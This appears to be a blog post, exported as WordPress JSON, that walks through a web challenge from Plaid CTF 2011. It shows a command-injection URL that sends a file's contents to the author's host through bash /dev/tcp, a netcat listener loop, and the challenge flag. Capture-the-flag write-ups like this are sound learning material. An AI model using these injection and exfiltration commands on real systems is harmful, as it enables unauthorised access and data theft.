{"id":308,"date":"2011-04-25T10:19:15","date_gmt":"2011-04-25T15:19:15","guid":{"rendered":"http:\/\/www.rajatswarup.com\/blog\/?p=308"},"modified":"2011-04-25T10:26:05","modified_gmt":"2011-04-25T15:26:05","slug":"plaid-ctf-2011-writeup-16","status":"publish","type":"post","link":"https:\/\/www.rajatswarup.com\/blog\/2011\/04\/25\/plaid-ctf-2011-writeup-16\/","title":{"rendered":"Plaid CtF 2011 &#8211; Writeup #16"},"content":{"rendered":"<p>The Plaid Parliament of Pwning organized their own Capture-the-Flag (CtF) contest this past weekend.  It was an excellent CtF with about 36 challenges ranging from trivia, exploitation, reverse engineering, web exploitation, cryptography, and forensics.<br \/>\n<strong><br \/>\nMy writeup for #16 &#8211; Plain sight [200 pts] web<\/strong><br \/>\nThe problem was<\/p>\n<blockquote><p>\nThe time to strike is now! This fiendish AED employee decided to hide secret data on this website (http:\/\/a4.amalgamated.biz\/cgi-bin\/chroot.cgi)<br \/>\nIt seems that the employee was in the middle of creating the website when our operatives stumbled upon it.<br \/>\nThe good news is that there are surely bugs in the development version of this problem, the bad news is currently no feedback printed to users.<br \/>\nSome of our leet operatives have determined a little bit about the machine: it runs in a read-only environment with only<br \/>\nbash cat dc expand grep hd head id less ls more nl od pr rev sh sleep sort sum tail tar tr true tsort ul wc yes<br \/>\ninstalled.<\/p>\n<p>Find what AED is hiding, good luck and godspeed.<\/p><\/blockquote>\n<p>There was a URL http:\/\/a4.amalgamated.biz\/cgi-bin\/chroot.cgi that allowed remote code execution.<br \/>\nbash, cat, less, more, ls were allowed. <\/p>\n<p>First thing I did was checked if the bash TCP connections were allowed using:<br \/>\nhttp:\/\/a4.amalgamated.biz\/cgi-bin\/chroot.cgi?ls>\/dev\/tcp\/MYIP\/5000 <\/p>\n<p>That seemed to work.  So then I listed the directories one by one until I bumped onto:<br \/>\nI used http:\/\/a4.amalgamated.biz\/cgi-bin\/chroot.cgi?cat%20keyfolder\/key>\/dev\/tcp\/MYIP\/5000 I had the port forwarded to my PC and a netcat listener running in a loop<br \/>\n<code> while [ 1 ]<br \/>\n do<br \/>\n   nc -l -v -p 5000<br \/>\n done<br \/>\n<\/code><br \/>\nThe answer was esc4p3_str1ng5.<\/p>\n<p>Fun times!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>The Plaid Parliament of Pwning organized their own Capture-the-Flag (CtF) contest this past weekend. It was an excellent CtF with about 36 challenges ranging from trivia, exploitation, reverse engineering, web exploitation, cryptography, and forensics. My writeup for #16 &#8211; Plain sight [200 pts] web The problem was The time to strike is now! This fiendish [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[230],"tags":[222,437,436],"class_list":["post-308","post","type-post","status-publish","format-standard","hentry","category-howto","tag-ctf","tag-pctf2011","tag-writeup"],"_links":{"self":[{"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/posts\/308","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/comments?post=308"}],"version-history":[{"count":2,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/posts\/308\/revisions"}],"predecessor-version":[{"id":310,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/posts\/308\/revisions\/310"}],"wp:attachment":[{"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/media?parent=308"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/categories?post=308"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.rajatswarup.com\/blog\/wp-json\/wp\/v2\/tags?post=308"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}